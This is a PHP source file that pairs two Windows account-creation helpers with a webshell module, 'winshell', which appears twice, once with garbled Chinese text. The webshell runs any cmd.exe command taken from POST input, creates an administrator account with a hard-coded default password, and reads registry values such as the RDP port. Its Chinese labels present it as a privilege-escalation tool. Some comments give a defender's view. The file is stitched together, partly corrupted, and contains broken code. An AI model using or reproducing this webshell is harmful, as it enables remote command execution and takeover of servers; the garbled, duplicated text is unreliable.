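/**
 * Create a local Windows account through the ADSI WinNT provider (or reuse an
 * existing one with the same name) and set its password.
 *
 * The account name is interpolated straight into the WinNT:// bind path, so it
 * must already be a validated, single-label account name when it reaches here.
 *
 * @param string $basename account name used for the WinNT://./<name> bind
 * @param string $password password applied to the account
 * @param mixed  $id       accepted for signature compatibility; not used by this implementation
 * @param mixed  $shell    accepted for signature compatibility; not used by this implementation
 * @param string $dir      accepted for signature compatibility; not used by this implementation
 * @return void
 */
function os_create_system_user($basename, $password, $id, $shell, $dir = "/tmp")
{
    $container = new COM("WinNT://.");
    try {
        // Bind to an existing account first; any failure to bind is treated as "not found".
        $account = new COM("WinNT://./{$basename}");
    } catch (Exception $e) {
        $account = $container->create("user", $basename);
        // Commit the new object before setting its password: the WinNT provider
        // needs the account to exist on the server before setPassword() can act on it.
        $account->setInfo();
    }
    $account->setPassword($password);
    $account->setInfo();
}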
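 /**
  * Create the Windows account backing $this->main through the ADSI WinNT
  * provider, or accept an existing account that already carries the expected
  * description.
  *
  * Flow: bind to WinNT://./<nname>. If the bind succeeds the account exists and
  * is accepted only when its Description equals
  * uuser::getUserDescription(<parent name>); otherwise "user_exists" is raised.
  * If the bind fails the account is created, committed, added to the local
  * Users group, given its password and description, and committed again.
  *
  * @return bool|null true when a matching account already existed; no value
  *                   after creating a new account
  * @throws lxexception "user_exists" when an account with a different
  *                     description already exists, or when committing the new
  *                     account fails
  */
 function createUser()
 {
     $mn = $this->main;
     $nname = $mn->nname;
     $parentname = $mn->getParentName();
     $expectedDescription = uuser::getUserDescription($parentname);
     print "creatinguser\n";
     $container = new COM("WinNT://.");

     // Probe for an existing account. Only the bind (and the Description read)
     // sit inside the try, so the "exists with another description" error
     // raised further down cannot be mistaken for a failed bind and trigger a
     // second create attempt.
     $existing = null;
     $currentDescription = null;
     try {
         $existing = new COM("WinNT://./{$nname}");
         $currentDescription = $existing->Description;
     } catch (Exception $e) {
         // Bind failed: treat as "account does not exist yet".
         $existing = null;
     }
     if ($existing !== null) {
         dprint("description\n");
         dprint($currentDescription);
         dprint("\n");
         if ($currentDescription === $expectedDescription) {
             return true;
         }
         throw new lxexception("user_exists", 'web_s_uuser_nname', $nname);
     }

     $user = $container->create("user", $nname);
     $user->HomeDirectory = convertTobackSlash("c:/webroot/{$parentname}/{$parentname}");
     try {
         // Commit the new object; password and group operations need the
         // account to be written to the server first.
         $user->setInfo();
     } catch (Exception $e) {
         log_error("User Couldn't be created");
         throw new lxexception("user_exists", 'web_s_uuser_nname', $nname);
     }
     $grp = new COM("WinNT://./Users");
     $grp->Add("WinNT://{$nname}");
     $user->setPassword($mn->realpass);
     $user->Description = $expectedDescription;
     $user->setInfo();
 }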
/**
 * Webshell helper view for Windows hosts: renders one of three forms chosen by
 * $_GET['winshell'] and, on POST, hands the submitted values to a COM object
 * (WScript.Shell or Shell.Users). No request value is validated or encoded
 * before use, so whoever can reach this script controls what it does. From the
 * defender's side, a PHP worker instantiating WScript.Shell / Shell.Users and
 * spawning cmd.exe is the artifact to alert on.
 *
 * @return void
 */
function winshell()
{
    $nop = '  ';
    // Sub-page selection comes from the query string; the hidden "do" field is
    // meant to gate the action on a submitted form.
    if ($_GET['winshell'] == 'wscript') {
        // Interpreter path and command line are taken from the request, with
        // hard-coded fallbacks when the fields are empty.
        $wcmd = $_POST['wcmd'] ? $_POST['wcmd'] : 'net user';
        $wcpth = $_POST['wcpth'] ? $_POST['wcpth'] : 'cmd.exe';
        print <<<END
<div class="actall">
<form action="?s=jk&winshell=wscript" method="POST">
<input type="hidden" name="do" id="do" value="do"><br>
{$nop}<input type="text" name="wcmd" id="wcmd" value="{$wcpth}" style="width:300px;"> -&gt; CMD·��<br />
{$nop}<input type="text" name="wcmd" id="wcmd" value="{$wcmd}" style="width:300px;"> <input type="submit" value="ִ��" style="width:80px;">
<br><br><br></form></div>
END;
        if ($_POST['do'] == 'do') {
            // "<interpreter> /c <command>" executed through WScript.Shell.
            $ww = $wcpth . " /c " . $wcmd;
            // `new` either returns an object or throws, so the `or die` arm never runs.
            $phpwsh = new COM("Wscript.Shell") or die("����Shell.Wscript����ʧ��");
            $phpexec = $phpwsh->exec($ww);
            $execoutput = $wshexec->stdout();
            $result = $execoutput->readall();
            echo $result;
            // Error-suppressed release of the COM object.
            @$phpwsh->Release();
            $phpwsh = NULL;
        }
    } elseif ($_GET['winshell'] == 'shelluser') {
        // Account name and password come from the request; both fallbacks are
        // hard-coded in this file.
        $wuser = $_POST['wuser'] ? $_POST['wuser'] : '******';
        $wpasw = $_POST['wpasw'] ? $_POST['wpasw'] : '1234@silic#';
        print <<<END
<div class="actall">
<form action="?s=jk&winshell=shelluser" method="POST">
<input type="hidden" name="do" id="do" value="do"><br>
Shell.Users�������ӹ���Ա<br><br>
{$nop}�½��û�����<input type="text" name="wuser" id="wuser" value="{$wuser}" style="width:100px;"><br>
{$nop}���û����룺<input type="text" name="wpasw" id="wpasw" value="{$wpasw}" style="width:100px;"><br><br>
<input type="submit" value="����" style="width:80px;">
<br><br><br></form></div>
END;
        // Assignment, not comparison: this block runs on every request to the
        // shelluser view, including a plain GET that submitted no form.
        if ($_POST['do'] = 'do') {
            $shell = new COM("Shell.Users");
            $cmd = $shell->create($wuser);
            $cmd->changePassword($wpasw, "");
            // The form text above labels this view as adding an administrator;
            // the meaning of the numeric value 3 is not established in this file.
            $cmd->setting["AccountType"] = 3;
        }
    } elseif ($_GET['winshell'] == 'regedit') {
        // Registry value path comes from the request; the default points at the
        // Terminal Server (RDP) listener port value.
        $regpath = $_POST['regpath'] ? $_POST['regpath'] : 'HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\\PortNumber';
        print <<<END
<div class="actall">
<form action="?s=jk&winshell=regedit" method="POST">
<input type="hidden" name="do" id="do" value="do"><br>
RegRead()������ȡע��������(Shell.Wscript����)<br><br>
ע����·����<br>
{$nop}<input type="text" name="regpath" id="regpath" value="{$regpath}" style="width:720px;"><br><br>
<input type="submit" value="��ȡ����" style="width:80px;">
<br><br><br></form></div>
END;
        if ($_POST['do'] == 'do') {
            // `new` either returns an object or throws, so the `or die` arm never runs.
            $shell = new COM("WScript.Shell") or die("����Shell.Wscript����ʧ��");
            try {
                $registry_proxystring = $shell->RegRead($regpath);
            } catch (Exception $e) {
                echo '����: ' . $e->getMessage();
            }
            // Only assigned when RegRead succeeded; after a caught exception this
            // echoes an undefined variable.
            echo $registry_proxystring;
        }
    } else {
        // Landing menu linking the three views; $tip is repeated under each entry.
        $tip = "�ݲ��Ա����ܿ��õĿ�����Ϊ����֮һ<br>Webshell���ڷ���������ΪWindowsϵͳ<br>PHP��Ȩ����������ڷdz����ε�ʱ�����Գ��Ա�����<br></h5><br><br><br>";
        print <<<END
<div class="actall"><pre>
<br><a href="?s=jk&winshell=wscript"> [ WScript���� ] </a><br><br>
<h5>������ʹ��PHP����Windows�����е�Wscript������<br>
Wscript����cmd��������<br>{$tip}<a href="?s=jk&winshell=shelluser"> [ Shell.User���� ] </a><br><br>
<h5>������ʹ��PHP����Windows�����е�Shell.user����<br>
USER����ΪWindowsϵͳ�û�������������<br>{$tip}<a href="?s=jk&winshell=regedit"> [ ע������ȡ ] </a><br><br>
<h5>������ʹ��PHP����Windows�����е�Shell.Wscript����<br>
RegRead()������ȡϵͳע��������<br>{$tip}</pre></div>
END;
    }
}
/**
 * Webshell helper view for Windows hosts: renders one of three forms chosen by
 * $_GET['winshell'] and, on POST, hands the submitted values to a COM object
 * (WScript.Shell or Shell.Users). No request value is validated or encoded
 * before use, so whoever can reach this script controls what it does. From the
 * defender's side, a PHP worker instantiating WScript.Shell / Shell.Users and
 * spawning cmd.exe is the artifact to alert on.
 *
 * @return void
 */
function winshell()
{
    $nop = '&nbsp;&nbsp;';
    // Sub-page selection comes from the query string; the hidden "do" field is
    // meant to gate the action on a submitted form.
    if ($_GET['winshell'] == 'wscript') {
        // Interpreter path and command line are taken from the request, with
        // hard-coded fallbacks when the fields are empty.
        $wcmd = $_POST['wcmd'] ? $_POST['wcmd'] : 'net user';
        $wcpth = $_POST['wcpth'] ? $_POST['wcpth'] : 'cmd.exe';
        print <<<END
<div class="actall">
<form action="?s=jk&winshell=wscript" method="POST">
<input type="hidden" name="do" id="do" value="do"><br>
{$nop}<input type="text" name="wcmd" id="wcmd" value="{$wcpth}" style="width:300px;"> -&gt; CMD路径<br />
{$nop}<input type="text" name="wcmd" id="wcmd" value="{$wcmd}" style="width:300px;"> <input type="submit" value="执行" style="width:80px;">
<br><br><br></form></div>
END;
        if ($_POST['do'] == 'do') {
            // "<interpreter> /c <command>" executed through WScript.Shell.
            $ww = $wcpth . " /c " . $wcmd;
            // `new` either returns an object or throws, so the `or die` arm never runs.
            $phpwsh = new COM("Wscript.Shell") or die("创建Shell.Wscript组件失败");
            $phpexec = $phpwsh->exec($ww);
            $execoutput = $wshexec->stdout();
            $result = $execoutput->readall();
            echo $result;
            // Error-suppressed release of the COM object.
            @$phpwsh->Release();
            $phpwsh = NULL;
        }
    } elseif ($_GET['winshell'] == 'shelluser') {
        // Account name and password come from the request; both fallbacks are
        // hard-coded in this file.
        $wuser = $_POST['wuser'] ? $_POST['wuser'] : '******';
        $wpasw = $_POST['wpasw'] ? $_POST['wpasw'] : '1234@silic#';
        print <<<END
<div class="actall">
<form action="?s=jk&winshell=shelluser" method="POST">
<input type="hidden" name="do" id="do" value="do"><br>
Shell.Users组件添加管理员<br><br>
{$nop}新建用户名:<input type="text" name="wuser" id="wuser" value="{$wuser}" style="width:100px;"><br>
{$nop}新用户密码:<input type="text" name="wpasw" id="wpasw" value="{$wpasw}" style="width:100px;"><br><br>
<input type="submit" value="添加" style="width:80px;">
<br><br><br></form></div>
END;
        // Assignment, not comparison: this block runs on every request to the
        // shelluser view, including a plain GET that submitted no form.
        if ($_POST['do'] = 'do') {
            $shell = new COM("Shell.Users");
            $cmd = $shell->create($wuser);
            $cmd->changePassword($wpasw, "");
            // The form text above labels this view as adding an administrator;
            // the meaning of the numeric value 3 is not established in this file.
            $cmd->setting["AccountType"] = 3;
        }
    } elseif ($_GET['winshell'] == 'regedit') {
        // Registry value path comes from the request; the default points at the
        // Terminal Server (RDP) listener port value.
        $regpath = $_POST['regpath'] ? $_POST['regpath'] : 'HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\\PortNumber';
        print <<<END
<div class="actall">
<form action="?s=jk&winshell=regedit" method="POST">
<input type="hidden" name="do" id="do" value="do"><br>
RegRead()函数读取注册表内容(Shell.Wscript组件)<br><br>
注册表路径:<br>
{$nop}<input type="text" name="regpath" id="regpath" value="{$regpath}" style="width:720px;"><br><br>
<input type="submit" value="读取内容" style="width:80px;">
<br><br><br></form></div>
END;
        if ($_POST['do'] == 'do') {
            // `new` either returns an object or throws, so the `or die` arm never runs.
            $shell = new COM("WScript.Shell") or die("创建Shell.Wscript组件失败");
            try {
                $registry_proxystring = $shell->RegRead($regpath);
            } catch (Exception $e) {
                echo '内容: ' . $e->getMessage();
            }
            // Only assigned when RegRead succeeded; after a caught exception this
            // echoes an undefined variable.
            echo $registry_proxystring;
        }
    } else {
        // Landing menu linking the three views; $tip is repeated under each entry.
        $tip = "据测试本功能可用的可能性为万分之一<br>Webshell所在服务器必须为Windows系统<br>PHP提权很灵活,但你在非常无奈的时候可以尝试本功能<br></h5><br><br><br>";
        print <<<END
<div class="actall"><pre>
<br><a href="?s=jk&winshell=wscript"> [ WScript组件 ] </a><br><br>
<h5>本功能使用PHP调用Windows组件中的Wscript组件。<br>
Wscript为调用cmd命令组件<br>{$tip}<a href="?s=jk&winshell=shelluser"> [ Shell.User组件 ] </a><br><br>
<h5>本功能使用PHP调用Windows组件中的Shell.user组件<br>
USER组件为Windows系统用户操作相关组件<br>{$tip}<a href="?s=jk&winshell=regedit"> [ 注册表读取 ] </a><br><br>
<h5>本功能使用PHP调用Windows组件中的Shell.Wscript组件<br>
RegRead()函数读取系统注册表内容<br>{$tip}</pre></div>
END;
    }
}